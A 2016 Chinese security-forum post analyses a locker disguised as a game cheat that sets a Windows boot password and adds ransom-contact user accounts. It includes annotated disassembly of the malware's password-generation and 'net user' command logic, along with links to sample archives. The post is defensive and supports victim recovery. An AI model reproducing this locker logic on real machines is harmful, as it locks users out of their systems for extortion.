好友
阅读权限10
听众
最后登录1970-1-1
|
无言士
发表于 2016-1-28 17:56
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 无言士 于 2016-1-28 18:19 编辑
基本信息:
文件名称:最新内部辅助 请关闭杀毒之后打开使.vmp.exe
文件大小:4472832 字节
文件版本:1.0.0.1
MD5 :336F0E1B4B88D43543A30A69A0D2E9F6
SHA1 :8C732514EC8A5B5C9CE42B12B2FE47494587D090
症状:
设置开机密码,重启后多出2个用户 "加QQ1603987441" "随机数????"
脱壳:
VMP壳,在VirtualProtect设置断点,多次运行,到堆栈显示NewProtect = PAGE_READONLY后到程序领空
分析:
简单看了一下字符串
在关键字段首下硬件断点
单步向下并对代码进行分析
00401153 BB 90184000 mov ebx,最新内部.00401890
00401158 E8 14050000 call 最新内部.00401671 ; 生成随机数 十六进制 71B8 -> 十进制 29112
0040115D 83C4 1C add esp,0x1C
00401160 8945 FC mov dword ptr ss:[ebp-0x4],eax ; 随机数29112
00401163 DB45 FC fild dword ptr ss:[ebp-0x4]
00401166 DD5D E4 fstp qword ptr ss:[ebp-0x1C]
00401169 DD45 E4 fld qword ptr ss:[ebp-0x1C]
0040116C DC25 4C674600 fsub qword ptr ds:[0x46674C] ; 随机数-5 -> 29112-5=29107
00401172 DD5D DC fstp qword ptr ss:[ebp-0x24]
00401175 DD45 DC fld qword ptr ss:[ebp-0x24]
00401178 DC05 54674600 fadd qword ptr ds:[0x466754] ; +1732 -> 29107+1732=30839
0040117E DD5D D4 fstp qword ptr ss:[ebp-0x2C]
00401181 DD45 D4 fld qword ptr ss:[ebp-0x2C]
00401184 E8 7BFEFFFF call 最新内部.00401004 ; 计算出第一个值为30839
00401189 8945 F8 mov dword ptr ss:[ebp-0x8],eax ; 随机数29112
0040118C DB45 FC fild dword ptr ss:[ebp-0x4]
0040118F DD5D E4 fstp qword ptr ss:[ebp-0x1C]
00401192 DD45 E4 fld qword ptr ss:[ebp-0x1C]
00401195 DC0D 5C674600 fmul qword ptr ds:[0x46675C] ; 随机数*7 -> 29112*7=203784
0040119B DD5D DC fstp qword ptr ss:[ebp-0x24]
0040119E DD45 DC fld qword ptr ss:[ebp-0x24]
004011A1 DC05 64674600 fadd qword ptr ds:[0x466764] ; +3511 -> 203784+3511=207295
004011A7 DD5D D4 fstp qword ptr ss:[ebp-0x2C]
004011AA DD45 D4 fld qword ptr ss:[ebp-0x2C]
004011AD DC35 6C674600 fdiv qword ptr ds:[0x46676C] ; /2 -> 207295/2=103647.5
004011B3 DD5D CC fstp qword ptr ss:[ebp-0x34]
004011B6 68 01060080 push 0x80000601 ; 计算出第二个值为103647.5
004011BB FF75 D0 push dword ptr ss:[ebp-0x30]
004011BE FF75 CC push dword ptr ss:[ebp-0x34]
004011C1 68 01000000 push 0x1
004011C6 BB C0194000 mov ebx,最新内部.004019C0
004011CB E8 A1040000 call 最新内部.00401671
004011D0 83C4 10 add esp,0x10
004011D3 8945 C8 mov dword ptr ss:[ebp-0x38],eax
004011D6 68 74674600 push 最新内部.00466774 ; .@
004011DB FF75 C8 push dword ptr ss:[ebp-0x38] ; 最新内部.0040EF7D
004011DE B9 02000000 mov ecx,0x2
004011E3 E8 AEFEFFFF call 最新内部.00401096 ; 第二个计算的值与.@进行连接 -> 103647.5.@
004011E8 83C4 08 add esp,0x8
004011EB 8945 C4 mov dword ptr ss:[ebp-0x3C],eax
004011EE 8B5D C8 mov ebx,dword ptr ss:[ebp-0x38] ; 最新内部.0040EF7D
004011F1 85DB test ebx,ebx ; 最新内部.00401890
004011F3 74 09 je short 最新内部.004011FE
004011F5 53 push ebx ; 最新内部.00401890
004011F6 E8 6A040000 call 最新内部.00401665
004011FB 83C4 04 add esp,0x4
004011FE 8B45 C4 mov eax,dword ptr ss:[ebp-0x3C] ; 最新内部.0040A64F
00401201 50 push eax
00401202 8B5D F4 mov ebx,dword ptr ss:[ebp-0xC]
00401205 85DB test ebx,ebx ; 最新内部.00401890
00401207 74 09 je short 最新内部.00401212
00401209 53 push ebx ; 最新内部.00401890
0040120A E8 56040000 call 最新内部.00401665
0040120F 83C4 04 add esp,0x4
00401212 58 pop eax ; 最新内部.0040A64F
00401213 8945 F4 mov dword ptr ss:[ebp-0xC],eax
00401216 B8 77674600 mov eax,最新内部.00466777 ; 加QQ1603987441
0040121B 50 push eax
0040121C 8B5D F0 mov ebx,dword ptr ss:[ebp-0x10]
0040121F 85DB test ebx,ebx ; 最新内部.00401890
00401221 74 09 je short 最新内部.0040122C
00401223 53 push ebx ; 最新内部.00401890
00401224 E8 3C040000 call 最新内部.00401665 ; 使用CreateProcess执行命令行
00401229 83C4 04 add esp,0x4
0040122C 58 pop eax ; 最新内部.0040A64F
0040122D 8945 F0 mov dword ptr ss:[ebp-0x10],eax
00401230 68 01030080 push 0x80000301
00401235 6A 00 push 0x0
00401237 FF75 F8 push dword ptr ss:[ebp-0x8]
0040123A 68 01000000 push 0x1
0040123F BB C0194000 mov ebx,最新内部.004019C0
00401244 E8 28040000 call 最新内部.00401671
00401249 83C4 10 add esp,0x10
0040124C 8945 E8 mov dword ptr ss:[ebp-0x18],eax
0040124F FF75 E8 push dword ptr ss:[ebp-0x18]
00401252 68 86674600 push 最新内部.00466786 ; 随机码
00401257 B9 02000000 mov ecx,0x2
0040125C E8 35FEFFFF call 最新内部.00401096 ; 随机数文本与第一个计算的值相加 -> 随机数30839
00401261 83C4 08 add esp,0x8
00401264 8945 E4 mov dword ptr ss:[ebp-0x1C],eax
00401267 8B5D E8 mov ebx,dword ptr ss:[ebp-0x18]
0040126A 85DB test ebx,ebx ; 最新内部.00401890
0040126C 74 09 je short 最新内部.00401277
0040126E 53 push ebx ; 最新内部.00401890
0040126F E8 F1030000 call 最新内部.00401665 ; 使用CreateProcess执行命令行
00401274 83C4 04 add esp,0x4
发现过程中会先产生一个随机数
这一个随机数进行了两次运算得到两个值,分别是
显示的随机数 = 随机数-5+1732
密码有关的数 = (随机数*7+3511)/2
接着"随机数"与显示的随机数值进行连接,密码有关的数与".@"进行连接,最后再分别与"net user"连接形成完整的命令行提交CreateProcess进行执行
综上所述:开机密码=((显示的随机数-1732+5)*7+3511)/2 + ".@"
火眼分析报告:
http://fireeye.ijinshan.com/analyse.html?md5=336f0e1b4b88d43543a30a69a0d2e9f6&sha1=8c732514ec8a5b5c9ce42b12b2fe47494587d090#full
病毒样本:
病毒样本.part1.rar
(1003.52 KB, 下载次数: 9)
病毒样本.part2.rar
(1003.52 KB, 下载次数: 3)
病毒样本.part3.rar
(1003.52 KB, 下载次数: 3)
病毒样本.part4.rar
(1003.52 KB, 下载次数: 3)
病毒样本.part5.rar
(146.74 KB, 下载次数: 2)
简单分析,老鸟勿喷!有何不足希望各位指教!
|
免费评分
-
查看全部评分
|
发表于 2016-1-28 18:02
|
发表于 2016-1-28 18:05
